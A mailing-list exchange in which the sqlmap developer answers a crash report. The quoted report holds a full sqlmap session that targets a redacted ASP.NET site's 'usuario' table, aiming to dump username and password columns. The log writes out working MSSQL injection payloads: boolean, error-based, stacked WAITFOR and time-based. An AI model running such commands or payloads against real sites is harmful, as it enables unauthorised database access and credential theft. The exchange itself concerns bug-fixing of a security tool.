hi Vinicius. thank you for your report. this resulted in a commit with few related "stability" patches (a.k.a. "None crashes").
so, with the last commit your problem should be solved. still, i am not sure why there was a 404: "[19:35:15] [INFO] the SQL query used returns 3 entries [19:35:15] [CRITICAL] connection exception detected. sqlmap will display partial output'page not found (404)'" if you think that was sqlmap's fault you can contact me privately with some more info. kr 2011/5/26 Vinícius ~ <viniciusmaxdal...@gmail.com>: > ./sqlmap.py -u "http://[snip]/Poll.aspx?id=10"; -T usuario -C > USUA_NO_USUARIO,USUA_ID_USUARIO,USUA_DE_SENHA --dump > > sqlmap/1.0-dev (r3952) - automatic SQL injection and database takeover > tool > http://sqlmap.sourceforge.net > > [*] starting at: 19:35:11 > > [19:35:11] [INFO] using '/home/sqlmap-dev/output/[snip]/session' as session > file > [19:35:11] [INFO] resuming injection data from session file > [19:35:11] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from > session file > [19:35:11] [INFO] testing connection to the target url > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: GET > Parameter: id > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: id=10 AND 3888=3888 > > Type: error-based > Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING > clause > Payload: id=10 AND > 3759=CONVERT(INT,(CHAR(58)+CHAR(108)+CHAR(118)+CHAR(122)+CHAR(58)+(SELECT > (CASE WHEN (3759=3759) THEN CHAR(49) ELSE CHAR(48) > END))+CHAR(58)+CHAR(109)+CHAR(106)+CHAR(107)+CHAR(58))) > > Type: stacked queries > Title: Microsoft SQL Server/Sybase stacked queries > Payload: id=10; WAITFOR DELAY '0:0:5';-- > > Type: AND/OR time-based blind > Title: Microsoft SQL Server/Sybase time-based blind > Payload: id=10 WAITFOR DELAY '0:0:5'-- > --- > > [19:35:12] [INFO] for manual usage GET and POST payloads require url > encoding > [19:35:12] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows Vista > web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0 > back-end DBMS: Microsoft SQL Server 2005 > [19:35:12] [WARNING] missing database parameter, sqlmap is going to use the > current database to enumerate table(s) entries > [19:35:12] [INFO] fetching current database > [19:35:12] [INFO] read from file '/home/[snip]/session': [snip] > do you want to use LIKE operator to retrieve column names similar to the > ones provided with the -C option? [Y/n] n > [19:35:14] [INFO] fetching columns 'USUA_NO_USUARIO, USUA_ID_USUARIO, > USUA_DE_SENHA' for table 'dbo.usuario' on database 'Club' > [19:35:15] [INFO] the SQL query used returns 3 entries > [19:35:15] [CRITICAL] connection exception detected. sqlmap will display > partial output'page not found (404)' > [19:35:16] [WARNING] HTTP error codes detected during testing: > 404 (Not Found) - 1 times, 500 (Internal Server Error) - 3 times > > [19:35:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3952), retry > your run with the latest development version from the Subversion repository. > If the exception persists, please send by e-mail to > sqlmap-users@lists.sourceforge.net the following text and any information > required to reproduce the bug. The developers will try to reproduce the bug, > fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r3952) > Python version: 2.6.6 > Operating system: posix > Command line: ./sqlmap.py -u > ************************************************************ -T usuario -C > ********************************************* --dump > Technique: ERROR > Back-end DBMS: Microsoft SQL Server (fingerprinted) > Traceback (most recent call last): > File "./sqlmap.py", line 84, in main > start() > File "/home/sqlmap-dev/lib/controller/controller.py", line 526, in start > action() > File "/home/sqlmap-dev/lib/controller/action.py", line 109, in action > conf.dbmsHandler.dumpTable() > File "/home/sqlmap-dev/plugins/generic/enumeration.py", line 1470, in > dumpTable > self.getColumns(onlyColNames=True) > File "/home/sqlmap-dev/plugins/generic/enumeration.py", line 1081, in > getColumns > if columnData[0] is not None: > TypeError: 'NoneType' object is unsubscriptable > > [*] shutting down at: 19:35:1 > > - > Thanx! > > ------------------------------------------------------------------------------ > vRanger cuts backup time in half-while increasing security. > With the market-leading solution for virtual backup and recovery, > you get blazing-fast, flexible, and affordable data protection. > Download your free trial now. > http://p.sf.net/sfu/quest-d2dcopy1 > _______________________________________________ > sqlmap-users mailing list > sqlmap-users@lists.sourceforge.net > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B ------------------------------------------------------------------------------ vRanger cuts backup time in half-while increasing security. With the market-leading solution for virtual backup and recovery, you get blazing-fast, flexible, and affordable data protection. Download your free trial now. http://p.sf.net/sfu/quest-d2dcopy1 _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
